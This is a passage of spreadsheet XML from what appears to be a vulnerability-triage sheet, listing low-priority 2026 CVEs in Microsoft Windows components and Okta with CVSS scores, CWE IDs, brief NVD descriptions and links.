    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78620</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S371"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T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69405</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69591</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K37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73" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69637</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69637</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69679</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69679</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69723</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69723</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78629</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q377" s="5" t="inlineStr"/>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S377"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T377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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8" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q378" s="5" t="inlineStr"/>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="S378" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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9" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q379" s="5" t="inlineStr"/>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="S379" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68851</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q380" s="5" t="inlineStr"/>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S380" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q381" s="5" t="inlineStr"/>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S381" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q382" s="5" t="inlineStr"/>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S382" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69406</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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3" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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4" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69504</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69616</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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7" s="5" t="inlineStr"/>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
